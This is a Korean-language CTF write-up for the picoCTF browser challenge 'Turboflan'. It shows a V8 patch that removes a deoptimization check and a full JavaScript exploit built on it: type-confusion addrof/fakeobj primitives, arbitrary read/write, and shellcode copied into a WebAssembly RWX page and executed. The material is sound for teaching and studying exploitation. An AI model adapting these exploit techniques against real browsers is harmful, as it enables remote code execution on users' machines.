[Browser Exploitation] picoCTF - Turboflan

🧡 Explaination

d8, source, server.py가 주어진다. server.py는 Download Horsepower 문제와 동일하다.

 

🧡 Function Explaination

__DeoptimizeIfNot 함수가 삭제되었다. 찾아보니 이 함수는 한 함수가 최적화 되고 그 함수의 타입이 바뀌었을 때 최적화를 해제하는 역할을 수행한다고 한다. 이 함수가 삭제되었으므로 최적화 버그를 발생시킬 수 있다.

diff --git a/src/compiler/effect-control-linearizer.cc b/src/compiler/effect-control-linearizer.cc
index d64c3c80e5..6bbd1e98b0 100644
--- a/src/compiler/effect-control-linearizer.cc
+++ b/src/compiler/effect-control-linearizer.cc
@@ -1866,8 +1866,9 @@ void EffectControlLinearizer::LowerCheckMaps(Node* node, Node* frame_state) {
       Node* map = __ HeapConstant(maps[i]);
       Node* check = __ TaggedEqual(value_map, map);
       if (i == map_count - 1) {
-        __ DeoptimizeIfNot(DeoptimizeReason::kWrongMap, p.feedback(), check,
-                           frame_state, IsSafetyCheck::kCriticalSafetyCheck);
+        // This makes me slow down! Can't have! Gotta go fast!!
+        // __ DeoptimizeIfNot(DeoptimizeReason::kWrongMap, p.feedback(), check,
+        //                     frame_state, IsSafetyCheck::kCriticalSafetyCheck);
       } else {
         auto next_map = __ MakeLabel();
         __ BranchWithCriticalSafetyCheck(check, &done, &next_map);
@@ -1888,8 +1889,8 @@ void EffectControlLinearizer::LowerCheckMaps(Node* node, Node* frame_state) {
       Node* check = __ TaggedEqual(value_map, map);
 
       if (i == map_count - 1) {
-        __ DeoptimizeIfNot(DeoptimizeReason::kWrongMap, p.feedback(), check,
-                           frame_state, IsSafetyCheck::kCriticalSafetyCheck);
+        // __ DeoptimizeIfNot(DeoptimizeReason::kWrongMap, p.feedback(), check,
+        //                     frame_state, IsSafetyCheck::kCriticalSafetyCheck);
       } else {
         auto next_map = __ MakeLabel();
         __ BranchWithCriticalSafetyCheck(check, &done, &next_map);

 

🧡 Attack Vector

위에서 설명했다싶이 최적화 관련해서 일어나는 버그를 이용해 취약점을 발생시킬 수 있다. 다음 예제를 봐보자.

function force_read(arr, idx) {
	for(var i=0; i<1; i++)
		i += 2;
	return arr[idx];
}

function force_write(arr, idx, val) {
	for(var i=0; i<1; i++)
		i +=2;
	arr[idx] = val;
}

function force_opti() {	
	for(var i=0; i<200000; i++) {
		force_read(temp, 0);
		force_write(temp, 13.37);
	}
}

var temp = [1.1, 1.2];
var obj = {"A": 1};
var obj_addr = [obj];

force_opti();

console.log(force_read(obj_addr, 0));

force_opti 함수에서 실수형 배열을 인자로 가지고 force_read 함수와 force_write 함수를 200,000번씩 수행한다. 원래 나의 의도 대로라면 hot and stable optimization이 되어야 하는데 force_read와 force_write 함수의 내용이 적어서 small function optimization이 수행된다. 근데 딱히.. 상관은 없다. 😁 만약 hot and stable optimization을 하고 싶으면 의미 없는 반복문을 여러 개 넣어주면 된다! 이제 실행을 해보면?

root@ubuntu:~/wargame/picoctf/turboflan# ./d8 ./test.js
1.914420234161599e-269

>>> hex(struct.unpack("Q", struct.pack("d", 1.914420234161599e-269))[0])
'0x8243a4108084eed'

Map과 properties에 해당하는 메모리가 leak 되었다. JSArray의 구조를 잘 생각해보면 왜 이렇게 나오는지 알 수 있다. 

* Double Array: elements -> value

* Object Array: elements -> elements -> value

 

이를 이용해서 익스플로잇 시나리오를 구성하면 된다.

 

🧡 How to Exploit?

최적화 버그를 이용해 최종적으로 AAR/AAW를 구현하여 쉘코드를 올리는 방법으로 공격을 진행할 것이다.

 

먼저, 원하는 object의 주소를 leak 할 수 있는 addrof 함수를 구현한다.

function addrof(custom) {
	obj_addr[0] = custom;
	fake_header = (obj_prop << 32n) + float_map;
	force_write(obj_addr, 1, itof(fake_header));
	
	var leak = force_read(obj_addr, 0);
	obj_addr[0] = obj;
	return ftoi(leak);
}

다음은 fakeobj 함수를 구현한다.

function fakeobj(addr) {
	force_write(obj_addr, 0, itof(addr)); //fake elements
	force_write(obj_addr, 1, itof((obj_prop << 32n) + obj_map))
	return obj_addr[0];
}

그리고, 메모리에 구조를 잘 계산해서 AAR/AAW 함수를 구현한다.

function aar(addr) {
	var implement_arr = [itof(float_map), 1.2, 1.3, 1.4];
	var fake = fakeobj(addrof(implement_arr) - 0x20n);
	var address = (2n << 32n) + (addr - 0x8n);

	implement_arr[1] = itof(address);
	return fake[0];
}

function aaw(addr, val) {
	var implement_arr = [itof(float_map), 1.2, 1.3, 1.4];
	var fake = fakeobj(addrof(implement_arr) - 0x20n);
	var address = (2n << 32n) + (addr - 0x8n);

	implement_arr[1] = itof(address);
	fake[0] = val;
}

최종 페이로드는 다음과 같다.

var buf = new ArrayBuffer(8);
var u32_buf = new Uint32Array(buf);
var f64_buf = new Float64Array(buf);

function itof(val) {
	u32_buf[0] = Number(BigInt(val) & 0xffffffffn);
	u32_buf[1] = Number(BigInt(val) >> 32n);
	return f64_buf[0];
}

function ftoi(val) {
	f64_buf[0] = val;
	return BigInt(u32_buf[0]) + (BigInt(u32_buf[1]) << 32n);
}

function force_read(arr, idx) {
	for(var i=0; i<1; i++)
		i += 2;
	return arr[idx];
}

function force_write(arr, idx, val) {
	for(var i=0; i<1; i++)
		i += 2;
	arr[idx] = val;
}

function addrof(custom) {
	obj_addr[0] = custom;
	fake_header = (obj_prop << 32n) + float_map;
	force_write(obj_addr, 1, itof(fake_header));
	
	var leak = force_read(obj_addr, 0);
	obj_addr[0] = obj;
	return ftoi(leak);
}

function fakeobj(addr) {
	force_write(obj_addr, 0, itof(addr)); //fake elements
	force_write(obj_addr, 1, itof((obj_prop << 32n) + obj_map))
	return obj_addr[0];
}

function aar(addr) {
	var implement_arr = [itof(float_map), 1.2, 1.3, 1.4];
	var fake = fakeobj(addrof(implement_arr) - 0x20n);
	var address = (2n << 32n) + (addr - 0x8n);

	implement_arr[1] = itof(address);
	return fake[0];
}

function aaw(addr, val) {
	var implement_arr = [itof(float_map), 1.2, 1.3, 1.4];
	var fake = fakeobj(addrof(implement_arr) - 0x20n);
	var address = (2n << 32n) + (addr - 0x8n);

	implement_arr[1] = itof(address);
	fake[0] = val;
}

function copy_shellcode(addr, shellcode) {
	var buffer = new ArrayBuffer(0x100);
	//%DebugPrint(buffer);
	var dataview = new DataView(buffer);
	var buffer_addr = addrof(buffer);
	var backing_store_addr = buffer_addr + 0x14n;

	aaw(backing_store_addr, addr);

	for(var i=0; i<shellcode.length; i++)
		dataview.setUint32(i*4, shellcode[i], true);
}

var obj = {"A": 1};
var obj_addr = [obj, obj];
var jit_arr = [1.1];
var float_arr = [13.37, 13.37, 13.37, 13.37];
var test = [11.11];

for(var i=0; i<200000; i++) {
	force_read(jit_arr, 0);
	force_write(jit_arr, 0, 13.37);
}

var obj_map = ftoi(force_read(obj_addr, 1)) & 0xfffffffn
var float_map = obj_map - 0x50n;
var obj_prop = ftoi(force_read(obj_addr, 1)) >> 32n;

var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;

var rwx_page_addr = ftoi(aar(addrof(wasm_instance)+0x68n-0x1n)) >> 8n;
var custom_shellcode = [0x0cfe016a, 0x2fb84824, 0x2f6e6962, 0x50746163, 0x68e78948, 0x7478742e, 0x0101b848, 0x01010101, 0x48500101, 0x756062b8, 0x606d6701, 0x04314866, 0x56f63124, 0x485e0c6a, 0x6a56e601, 0x01485e10, 0x894856e6, 0x6ad231e6, 0x050f583b];

console.log("rwx_page_addr: 0x" + rwx_page_addr.toString(16));
copy_shellcode(itof(rwx_page_addr), custom_shellcode);

f();